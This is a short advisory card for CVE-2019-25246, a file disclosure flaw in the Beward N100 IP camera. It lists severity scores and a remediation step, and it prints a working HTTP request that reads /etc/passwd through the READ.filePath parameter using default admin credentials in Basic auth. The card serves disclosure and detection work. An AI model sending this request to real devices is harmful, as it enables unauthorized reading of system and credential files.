| Title | BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure |
|---|---|
| Author | geeknik,liangtovi-debug |
| Severity | High |
| Impact | Authenticated attackers can read sensitive system files, potentially exposing critical information. |
| Remediation | Update to the latest version or apply vendor patches addressing this vulnerability |
| CVSS Score | 8.6 |
| EPSS Score | 0.10281 |
| CVE ID | CVE-2019-25246 |
| CWE ID | CWE-22,CWE-73 |
| Tags | cve cve2019 iot camera disclosure edb vuln |
Beward N100 H.264 VGA IP Camera M2.1.6 contains an authenticated file disclosure vulnerability caused by improper validation of the ‘READ.filePath’ parameter in fileread script and SendCGICMD API, letting authenticated attackers read arbitrary system files.
GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-25246.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-25246.pcap
N/AN/A